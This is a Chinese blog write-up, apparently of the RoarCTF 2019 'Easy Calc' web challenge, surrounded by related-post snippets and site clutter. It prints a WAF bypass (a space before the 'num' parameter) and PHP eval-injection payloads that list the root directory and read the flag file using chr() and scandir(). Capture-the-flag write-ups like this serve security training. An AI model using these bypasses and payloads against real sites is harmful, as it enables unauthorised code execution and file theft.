[RoarCTF 2019]Easy Calc1

于 2024-03-07 21:29:38 发布
阅读量361 收藏 8
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwyyyxxxx/article/details/136544080
版权

是个计算数字的页面,f12查看源码发现是将输入的值发送到calc.php

访问calc.php页面得到源码,黑名单对一些字符做了过滤

但是在拼接phpinfo()的时候显示的403,就算只输入一个a也不行

这时候想到主页的源码中有提到做了waf,经过多番尝试,最终在参数num前加上空格就能绕过,具体原理我也不清楚

但是在phpinfo里可以看到很多函数被禁用了,几乎不能任意命令执行,引号都被过滤了,读文件也不能直接读,这里我结合了无参数rce读取flag,因为这里可以有数字参数,所以没那么麻烦

chr()    //将ascll码转变成字符
scandir()    //返回指定目录的数组
readfile()    //读取指定文件
var_dump(scandir(chr(47)))

中括号被过滤了可以用大括号代替

用点连接/和flag的文件名
readfile(chr(47).scandir(chr(47)){7})

@Wyx
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1334
BUUCTF [RoarCTF 2019]Easy Calc1 WP
[RoarCTF 2019]Easy Calc 1
tomatoff的博客
05-12 2519
1、进入页面,还是一个输入页面: 2、常规三板斧: (1)输入1: (2)输入1’: (3)输入1": 3、发现没有报错,应该是思路错了,再打开源码试试: 4、下面提到了一个calc.php的页面,访问这个页面,blacklist中是过滤的字符: 5、这边知道传参只能为数字,于是参考[RoarCTF 2019]Easy Calc, 了解payload的构建; 6、构建函数 /calc.php? num=2;var_dump(scandir(chr(47))) 其中var_dump()用来打印;
[RoarCTF 2019]Easy Calc
weixin_41571993的博客
10-06 550
靶场练习
BUUCTF [RoarCTF 2019]Easy Calc
qq_53030229的博客
11-09 799
文章目录一、 [RoarCTF 2019]Easy Calc1、检查源码2、利用PHP的字符串解析绕过 一、 [RoarCTF 2019]Easy Calc 1、检查源码        1、当拿到题目时,本人以为是使用Linux命令获取flag,但是尝试之后不行        2、检查源码,发现了calc.php,打开     
[RoarCTF 2019]Easy Calc1 wp
m0_73612768的博客
12-15 1348
这里用到的方法有:空格绕过,url 溢出,http 请求走私。三种方法均可用来绕过 waf
【BUUCTF】[RoarCTF 2019]Easy Calc1
aoao331198的博客
03-14 347
题目网页是一个计算器 查看源代码发现线索calc.php 直接访问 这里对eval对get的内容执行,尝试注入php代码 前面也说了waf,我们这里利用php解析字符串的特性来绕过 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 图片来源博客PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_bin789456的博客-CS...
Calc Easy-开源
05-29
一个相当简单的快速计算器实现示例。
calc1
02-12
calc1
demo_calc1
02-13
demo_calc1
CRC_Calc .rar
12-04
压缩包内包含CRC_Calc和CheckOut两种全面的CRC计算器,涵盖几乎所有类型的CRC算法的计算,方便快捷,
win32calc简繁版
09-07
Win32 版本的计算器,简洁易用,从 LTSC 版本剥离。如果厌恶臃肿华而不实的 UWP 版计算器,可以试试这个版本。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8288
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“推荐系统”相关资源推荐
06-14
推荐了国内外对推荐系统的讲解相关资源
全渠道电商平台业务中台解决方案.pptx
06-14
全渠道电商平台业务中台解决方案.pptx
云计算企业私有云平台建设方案.pptx
06-14
云计算企业私有云平台建设方案.pptx
通过CNN卷积神经网络对盆栽识别-含图片数据集.zip
最新发布
06-14
本代码是基于python pytorch环境安装的。 下载本代码后,有个requirement.txt文本,里面介绍了如何安装环境,环境需要自行配置。 或可直接参考下面博文进行环境安装。 https://blog.csdn.net/no_work/article/details/139246467 如果实在不会安装的,可以直接下载免安装环境包,有偿的哦 https://download.csdn.net/download/qq_34904125/89365780 安装好环境之后, 代码需要依次运行 01数据集文本生成制作.py 02深度学习模型训练.py 和03pyqt_ui界面.py 数据集文件夹存放了本次识别的各个类别图片。 本代码对数据集进行了预处理,包括通过在较短边增加灰边,使得图片变为正方形(如果图片原本就是正方形则不会增加灰边),和旋转角度,来扩增增强数据集, 运行01数据集文本制作.py文件,会就读取数据集下每个类别文件中的图片路径和对应的标签 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地
0.96寸OLED显示屏
06-14
尺寸与分辨率:该显示屏的尺寸为0.96英寸,常见分辨率为128x64像素,意味着横向有128个像素点,纵向有64个像素点。这种分辨率足以显示基本信息和简单的图形。 显示技术:OLED(有机发光二极管)技术使得每个像素都能自发光,不需要背光源,因此对比度高、色彩鲜艳、视角宽广,且在低亮度环境下表现更佳,同时能实现更低的功耗。 接口类型:这种显示屏通常支持I²C(IIC)和SPI两种通信接口,有些型号可能还支持8080或6800并行接口。I²C接口因其简单且仅需两根数据线(SCL和SDA)而广受欢迎,适用于降低硬件复杂度和节省引脚资源。 驱动IC:常见的驱动芯片为SSD1306,它负责控制显示屏的图像显示,支持不同显示模式和刷新频率的设置。 物理接口:根据型号不同,可能有4针(I²C接口)或7针(SPI接口)的物理连接器。 颜色选项:虽然大多数0.96寸OLED屏为单色(通常是白色或蓝色),但也有双色版本,如黄蓝双色,其中屏幕的一部分显示黄色,另一部分显示蓝色。
2024年欧洲高端家用P1.29 LED显示屏市场主要企业市场占有率及排名.docx
06-14
2024年欧洲高端家用P1.29 LED显示屏市场主要企业市场占有率及排名
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值